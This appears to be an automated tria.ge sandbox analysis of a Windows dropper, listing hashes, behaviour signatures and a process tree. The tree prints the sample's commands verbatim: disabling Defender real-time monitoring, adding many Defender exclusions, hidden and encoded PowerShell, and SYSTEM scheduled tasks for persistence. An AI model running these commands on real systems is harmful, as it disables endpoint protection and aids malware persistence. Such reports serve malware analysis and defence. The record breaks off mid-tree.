Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    197s
  • max time network
    198s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    25/04/2024, 02:37

General

  • Target

    5d9f3e8dac066fb8ecfb8905d7baa8d41c45d446060330c91803aa20f1f5abb7.exe

  • Size

    6.3MB

  • MD5

    b94d98a7e13b9d8ee0b203e15cee3b77

  • SHA1

    25dc94bee8d11ddb38ae2feacea7d2271094f90e

  • SHA256

    5d9f3e8dac066fb8ecfb8905d7baa8d41c45d446060330c91803aa20f1f5abb7

  • SHA512

    2d6a1baf9a3ad87e7f65075f7754b24e5d2d23067f4468d63fd79e1c4e39a31f29fe8ac27a9b05cebdf03af4a54769c072ea2d444b51cf2203c7f1f9e3267cbc

  • SSDEEP

    98304:91Oup2zjJY231tFaCYTlZE1JLFSNGw6eJm5JeHxFKw7/X26jOnCB9XmtPtX4S8B/:91Ow2zjVpYD8vDwJmaHxbS2Os9qP0eEB

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 24 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5d9f3e8dac066fb8ecfb8905d7baa8d41c45d446060330c91803aa20f1f5abb7.exe
    "C:\Users\Admin\AppData\Local\Temp\5d9f3e8dac066fb8ecfb8905d7baa8d41c45d446060330c91803aa20f1f5abb7.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Users\Admin\AppData\Local\Temp\7zS1111.tmp\Install.exe
      .\Install.exe /bnSUDdidH "525403" /S
      2⤵
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Enumerates system info in registry
      • Suspicious use of WriteProcessMemory
      PID:2144
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Windows\SysWOW64\cmd.exe
          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2604
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2624
            • C:\Windows\SysWOW64\Wbem\WMIC.exe
              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2648
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "bwrroZoeZRoQVpyAcj" /SC once /ST 02:38:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\dzqHshX.exe\" ZO /Pbsite_idcHW 525403 /S" /V1 /F
        3⤵
        • Drops file in Windows directory
        • Creates scheduled task(s)
        PID:2536
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {6EE6C91A-AD73-4328-A9C5-FB723F98C27A} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2328
    • C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\dzqHshX.exe
      C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\dzqHshX.exe ZO /Pbsite_idcHW 525403 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:1924
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gDWUSNGnD" /SC once /ST 01:12:08 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Creates scheduled task(s)
        PID:1880
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gDWUSNGnD"
        3⤵
          PID:1876
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gDWUSNGnD"
          3⤵
            PID:944
          • C:\Windows\SysWOW64\cmd.exe
            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            3⤵
              PID:1092
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:1780
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
              3⤵
                PID:836
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:2816
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gRBchYcDP" /SC once /ST 00:27:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                3⤵
                • Creates scheduled task(s)
                PID:1180
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gRBchYcDP"
                3⤵
                  PID:1696
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /DELETE /F /TN "gRBchYcDP"
                  3⤵
                    PID:1716
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                    3⤵
                      PID:1988
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                        4⤵
                          PID:2788
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                            5⤵
                            • Drops file in System32 directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2744
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                              6⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:876
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
                        3⤵
                          PID:2780
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
                            4⤵
                            • Windows security bypass
                            PID:1524
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
                          3⤵
                            PID:1276
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
                              4⤵
                              • Windows security bypass
                              PID:1928
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
                            3⤵
                              PID:2352
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
                                4⤵
                                  PID:2960
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                  PID:3068
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                      PID:2592
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C copy nul "C:\Windows\Temp\heXdjphsLYtTYYrU\kieVWRGs\KFMWHJKNDLLTKIjV.wsf"
                                    3⤵
                                      PID:2528
                                    • C:\Windows\SysWOW64\wscript.exe
                                      wscript "C:\Windows\Temp\heXdjphsLYtTYYrU\kieVWRGs\KFMWHJKNDLLTKIjV.wsf"
                                      3⤵
                                      • Modifies data under HKEY_USERS
                                      PID:2104
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2524
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2624
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2548
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2736
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2272
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2456
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2404
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2420
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2476
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2840
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2100
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1916
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1656
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1620
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2292
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2072
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2388
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2580
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                          PID:884
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                            PID:1464
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:1444
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:488
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:1304
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:1780
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:2816
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                        PID:1708
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                          PID:908
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:448
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:2216
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\mMAjWdbxOIjSziVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:2248
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:2296
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:1968
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:1668
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                        PID:2496
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:2384
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\heXdjphsLYtTYYrU" /t REG_DWORD /d 0 /reg:64
                                                                          4⤵
                                                                            PID:772
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gOmIETmuX" /SC once /ST 01:00:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:2112
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gOmIETmuX"
                                                                          3⤵
                                                                            PID:2704
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gOmIETmuX"
                                                                            3⤵
                                                                              PID:2004
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                              3⤵
                                                                                PID:2436
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                  4⤵
                                                                                    PID:2516
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                  3⤵
                                                                                    PID:2524
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                      4⤵
                                                                                        PID:2972
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /CREATE /TN "qXnxKrbPbFSTFetyh" /SC once /ST 01:43:43 /RU "SYSTEM" /TR "\"C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\LrurqWt.exe\" ob /xTsite_iduVz 525403 /S" /V1 /F
                                                                                      3⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Creates scheduled task(s)
                                                                                      PID:2624
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /run /I /tn "qXnxKrbPbFSTFetyh"
                                                                                      3⤵
                                                                                        PID:2548
                                                                                    • C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\LrurqWt.exe
                                                                                      C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\LrurqWt.exe ob /xTsite_iduVz 525403 /S
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops Chrome extension
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:1600
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bwrroZoeZRoQVpyAcj"
                                                                                        3⤵
                                                                                          PID:2396
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:2416
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                                PID:2420
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:2476
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2884
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                        7⤵
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1368
                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                  forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                  4⤵
                                                                                                    PID:1948
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                      5⤵
                                                                                                        PID:2696
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
